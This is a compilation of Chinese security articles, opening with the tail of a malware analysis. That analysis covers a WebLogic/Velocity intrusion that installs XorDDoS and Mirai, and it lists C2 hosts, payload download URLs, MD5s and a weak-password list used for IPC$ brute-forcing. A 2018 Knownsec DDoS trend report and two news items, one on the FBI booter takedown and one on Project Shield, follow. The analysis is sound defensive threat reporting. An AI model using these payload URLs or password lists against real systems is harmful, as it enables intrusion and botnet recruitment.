攻击使用的.vm脚本为velocity支持的代码(velocity是基于java的web服务端模板引擎),利用该模板引擎的漏洞进行攻击后,执行远程代码cnm.vm,通过cnm.vm继续下载和执行Linux脚本9527.sh。 (hxxp:// 222.186.52.155:21541/9527.sh) Linux脚本9527.sh在感染机器植入ELF木马crosnice (hxxp:// 222.186.52.155:21541/crosnice) crosnice为感染Linux平台的XorDDoS木马, XorDDoS这个名称源于木马在与C&C(命令和控制服务器)的网络通信中大量使用XOR加密。 创建脚本/etc/cron.hourly/cron.sh,设置定时任务,每3分钟执行一次脚本。 写入脚本代码到/etc/init.d/%s/目录下 对其他机器发起DDoS攻击的代码 感染IoT设备 该服务器上还发现保存有多个mirai病毒变种,每个变种对应一个特定的平台。Mirai感染受害者设备后,会释放一个shell脚本ssh.sh,shell脚本会下载和执行与当前架构相适应的可执行文件。包括针对以下CPU架构而构建的二进制文件:arm、arm5、arm6、arm7、mips、mpsl、ppc、sh4、spc、xb6、m68k 二进制程序在相应的平台运行后会创建一个随机IP地址列表,并针对具有弱凭据或已知漏洞的设备进行探测攻击,同时连接C2地址,接受指令执行DDoS攻击。 安全建议 1. 定期对服务器进行加固,尽早修复服务器相关组件安全漏洞,部分Weblogic漏洞修复建议如下: CVE-2017-10271修复补丁地址: https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html CVE-2019-2725补丁包下载地址如下: https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html 2. 服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解,排查IOCs中的弱口令 3. 针对IoT设备的安全建议: 1)根据要求和安全策略修改IoT设备的默认隐私和安全设置。 2)更改设备上的默认凭据。为设备帐户和Wi-Fi网络使用强大且唯一的密码。 3)在设置Wi-Fi网络访问(WPA)时使用强加密方法。 4)禁用不需要的功能和服务。 5)禁用Telnet登录并尽可能使用SSH。 4. 使用腾讯御点拦截可能的病毒攻击(https://s.tencent.com/product/yd/index.html 5. 推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html IOCs IP 122.10.82.239 139.196.209.127 103.30.43.120 222.186.52.155 122.10.82.239 Domain xiaojiuddos.f3322.net 6004.f3322.net xiao999.f3322.net download.nadns.info nadns.info ip.yototoo.com C&C 139.196.209.127:2017 103.30.43.120:8080 103.30.43.120:99 222.186.52.155:21541 md5 ad2fee695125aa611311fe0d940da476 24abf520f8565b3867fb2c63778d59be 6595022fb65c6e02c1ebc731ce52b147 7a158bd42c896807431b798e70f6feb4 d329eddf620c9f232bad8eb106020712 975fe4000d8691b00c19fefae2041263 058281e2cb0add01537fb2a2e70f4ffc 17d704d023e8001f11b70cc3d1c1800a d1d4da603e2be3f131fa1030e9d0038e d34903535df5f704ad1fd25bd0d13f1c 57655082c058a53f9962e81f7c13f9d7 16e6ec559f3986faa22d89bfaca93a76 62a6eee507bde271f9ec8115526da15a 6a3ac93afcc8db933845bcac5f64347a 29845bf22eb39dda90b8219f495fea14 98d64c090183b72809d4aef0ed6359fd 4eb3be468994ad865317fb68cc983dc6 505e64fb3f1edbabc4374dbfc8f98063 eecca0eb6255682a520814e991515d83 f31daa9d4e9f5a24fc4dbe63ea717da6 d96a091040c54a18cdc1686533338253 414e0c8015865762933693b6eff5b8fd 9dec0cdebc8d1e6f8378af24bd66e4f4 a936182ca83f750e4845c5915800cb6b URL http[:]/103.30.43.120:99/1.png http[:]/103.30.43.120:99/ism.exe http[:]/103.30.43.120:99/loligang.arm http[:]/103.30.43.120:99/rsrr.vm http[:]/103.30.43.120:99/W4.7.exe http[:]/103.30.43.120:99/2.png http[:]/103.30.43.120:99/down.png http[:]/103.30.43.120:99/payload.exe http[:]/103.30.43.120:99/pos.vm http[:]/103.30.43.120:99/weblogic.sh http[:]/222.186.52.155:21541/arxc http[:]/222.186.52.155:21541/mixc http[:]/222.186.52.155:21541/loligang.arm http[:]/222.186.52.155:21541/loligang.arm5 http[:]/222.186.52.155:21541/loligang.mips http[:]/222.186.52.155:21541/sh/1.sh http[:]/222.186.52.155:21541/sh/AV.sh http[:]/222.186.52.155:21541/sh/dcmini.sh http[:]/222.186.52.155:21541/sh/nice.sh http[:]/222.186.52.155:21541/sh/R.sh IPC$弱口令: Woaini Baby Asdf Angel Asdfgh 1314520 5201314 Caonima 88888 Bbbbbb 12345678 Memory Abc123 Qwerty 123456 111 Password Enter Hack Xpuser Money Yeah Time 参考链接: https://www.freebuf.com/column/153847.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://www.symantec.com/blogs/threat-intelligence/mirai-cross-platform-infection

知道创宇 2018 年度网络安全(云安全)态势报告

前言 2018年,网络安全领域暗流涌动,攻击趋势不断攀升,T级DDoS攻击多次爆发、数据泄露事件层出不穷、勒索软件大行其道。此外,随着我国互联网行业“出海”新浪潮的来临,海外业务的激增刺激了大量海外黑客势力加入到“分蛋糕”的队伍。 除攻击源增多外,被攻击的目标范围也不断扩大,越来越多的攻击出现在此前少见的、更为细分的行业领域。各行业网站都面临着更加严峻的安全考验。 本报告采样2018年知道创宇云防御平台的网络攻防数据,重点针对DDoS攻击和Web攻击数据对2018年网络攻击态势进行展示与分析。   一、DDoS攻击趋势分析 2018年,DDoS攻击峰值突破T级。行业内防御攻击的最高峰值已达1980Gbps ,同比增长高达200% 。 同时,新型反射型攻击的相继出现,预示着DDoS攻击问题的严峻与棘手。 随着两会、数博会的召开,DDoS攻击次数在5月份达到上半年最高峰。下半年,随着电商促销等活动的进行,攻击量达到全年的高峰。有趣的是,攻击者似乎也有双休,周末较工作日的攻击情况相对缓和。   二、DDoS攻击规模对比分析 2018年以来,不同规模的攻击均成倍增长,尤其是中型DDoS攻击(10-50Gbps)更是惊人地增长了293.44% ,而超大型攻击(600Gbps以上)的增长率也已达93.33% 。与之相反,可被利用发动攻击的资源数量较去年却有所减少,稳定性也在逐步降低。 以上数据愈发验证了攻击成本在逐步下降,攻击者只需利用极少的资源,即可发动流量巨大的DDoS攻击,产生强大的破坏力。   三、DDoS攻击类型分析(流量型攻击) 2018年,流量型攻击依旧是企业的梦魇。新型攻击手法,如IPMI反射、TCP反射攻击等相继出现并逐渐活跃。但传统攻击手段如SYN Flood依旧是黑客最青睐的手段。   四、受DDoS攻击地域分布 2018年,中国依旧是全球遭受DDoS攻击最严重的国家。 就全国范围来看,攻击仍然集中于互联网经济较为发达的地区,如广东、浙江、江苏等地。   五、受DDoS攻击行业分布 2018年,DDoS攻击依旧集中在游戏、金融和泛区块链等收入较高的互联网行业。此外,政府网站受攻击比例大幅上升。尤其在第三、四季度,政府、教育机构成为黑客重点攻击的对象。   6月高考季,有黑客对高考查分网站、志愿填报网站以及多个大学官网发动DDoS大流量攻击。 六、CC攻击趋势分析 2018年,抗D保共抵御来自超过1.6亿IP发起的5千多亿次攻击。   七、 Web应用攻击趋势分析 2018年,网站整体攻击趋势呈不断上涨的态势,平均每日攻击量超8亿次,同时伴有较大的波动。2018年8月份出现攻击高峰,峰值达到单日49亿余次   八、Web应用攻击手段分析 在过去的一年中,黑客常用的Web攻击手段超过9种,其中占比最大的两种为:扫描器和网站后门。   九、Web应用攻击源地分析(境内) 2018年,97% 的Web攻击发起地域源于境内,3% 来自境外。 据境内攻击数据显示,大部分攻击源地分布在一些国家中心城市所在区域,比如:北京、河南、陕西、上海等地。   十、Web应用攻击源地分析(境外) 数据显示, 3.26%的Web攻击发起地域源于境外,且总体呈现平稳上升的攻击态势,平均每日攻击量数千万次,并伴有多次大幅波动。大部分攻击来自美国、韩国及日本等,其中美国一直以来都是最大的境外攻击源头。 需特别注意的是,来自境外的攻击中,针对政府和金融网站发起的攻击次数远高于其他网站。 【安全专家提示:为维护政府的正面形象,及保障金融网站的重要资产,需要建立完善且牢固的网络安全体系来保证网站的安全稳定运行。】   十一、受Web应用攻击行业分析 2018年,政府组织是黑客攻击的主要目标,一些包含大量有价值的数据信息的网站,经常会被网络爬虫获取大量数据。 其次,金融理财、新闻媒体以及近两年来兴起的区块链金融也非常容易受到网络攻击。此外,我国的地下互联网也存在着各种各样的网络威胁以及商业竞争,只要在行业内稍有名气,网络攻击就会伴随而至。   十二、创宇聚焦——政府网站攻击态势 政府网站不仅是一个国家形象重要的展示窗口,伴随着在线政务的发展,政府网站所遭受的网络攻击压力越来越大。尤其在有突发性政治、军事等敏感事件期间,政府网站受到的攻击会有一个明显的增长。   十三、创宇聚焦—境外敌对势力 数据显示,来自境外的网络攻击逐年上升,威胁不可小觑。不仅存在“匿名者”、“反共黑客”等长期活跃在网络世界的组织,更有一些隐蔽的专业黑客组织对我国政府、军事、金融等行业网站进行长期渗透。 以某境外黑客组织为例: 平均每月有10 余个网站被攻击 被攻击过的网站中,75% 已经不能正常访问 被攻击过的网站中,政府网站占比最高26%   被攻击网站的地理分布   十四、创宇聚焦—创宇盾威胁情报 2018年,创宇盾威胁情报平台共发现2000 多个安全威胁,其中,78% 的安全漏洞都属于严重及高危的漏洞,安全形势较为严峻。   十五、2018年度安全态势总结 2018年整体网络攻击趋势不断上升,绝大部分攻击仍然来自国内,来自境外的攻击趋势同样上升明显,威胁不可小觑。 随着我国各项网络安全政策的推进和实施,进一步加强了我国的网络安全保障能力。《推进互联网协议第六版(IPv6)规模部署行动计划》的出台有力推动了我国网络基础设施的发展,但伴随而来的安全风险也对各个网络安全厂商提出了新的要求和挑战。 知道创宇将继续秉承“侠之大者,为国为民”的使命,继续为全国政府、企事业单位及互联网用户提供顶级网络安全防护。 *数据来源:知道创宇云防御平台  

FBI 扫除了一批付费发起 DDoS 攻击的网站

据外媒报道,在执法部门和多家科技企业的协助下,美国联邦调查局(FBI)已经扫除了 15 个臭名昭著的付费式 DDoS 攻击网站。加州联邦法官批准的多份扣押凭证,已于本周四生效。在扣押非法提供 DDoS 租用的网站后,其域名也将被有关部门收走。根据在美国三处联邦法院提交的证词,检察官指控了三名男子,分别是来自几周的 Matthew Gatrel 和 Juan Martinez、以及来自阿拉斯加的 David Bukoski 。 美国司法部长布莱恩施罗德在一份声明中称:“像这样的租赁式 DDoS 攻击服务,对美国构成了重大的安全威胁。而这些协同调查和起诉,证明了与公共部门展开跨区域合作的重要性。” 本次行动扫除了包括 downthem.org、netstress.org、quantumstress.net、vbooter.org、defcon.pro 等在内的十余个非法。在协助调查的企业中,Cloudflare、Flashpoint、谷歌等科技巨头榜上有名。 长期以来,DDoS 一直困扰着互联网。许多攻击,都是利用互联网底层协议漏洞的副产品。近年来,租赁式的 DDoS 攻击服务变得愈加普遍,但它显然不可一直游走在灰色地带。 虽然许多人借助 booter 和 stresser 网站开展合法的业务 —— 比如测试企业网络对于 DDoS 攻击的弹性抵御能力 —— 但也有更多不法之徒借此来发起大规模攻击。 起诉书中提到的一些网站,攻击速度超过了每秒 40Gbps,足以让不少网站在一段时间内宕机离线。美司法部指出,Downthem 的 2000 多名客户,发动了超过 20 万次的攻击。   稿源:cnBeta,封面源自网络;

Alphabet 的 Project Shield 扩展至保护政治团体免受 DDoS 攻击

Alphabet 旗下的 Project Shield 是个提供免费 DDoS 保护服务的计划,但过去就只有开放予新闻组织申请,不过今天他们就宣布服务范围推展至美国的政治团体,包括候选人、政治行动委员会和政治活动。 Project Shield 是由前身为 Google Ideas 的 Jigsaw 提供,致力于保护言论和获取真实信息的自由。这计划在 2016 年开始提供服务,以反向代理多层保护系统(proxy multi-layer defense system)来保护新闻机构免受 DDoS 的攻击,让大众能持续获得信息。虽然 Project Shield 也欢迎大型组织申请,不过他们的目的还是保护只有较少资源来抵挡这类网络攻击的小型新闻机构。因应近来针对民主组织的 DDoS 攻击愈趋严重,Project Shield 也要挺身而出。 申请 Project Shield 保护的服务非常简单,所有已经注册的政治组织都可以在专属网页登记。当工具设定好之后,网页就会受到 Project Shield 的保护,及后所有的访问流量都会先经过他们的服务,把有可疑的要求过滤走。 Project Shield 表示在未来数个月更会把服务扩展至国际政治团体,让更多组织的网页都能受到这免费的保护服务。Jigsaw 的机器学习能力同时也有用于对抗网上的仇恨言论。自此,缺乏资源的小型组织都免受言论审查和阻挡言论自由的恶意攻击影响。   稿源:engadget,封面源自网络;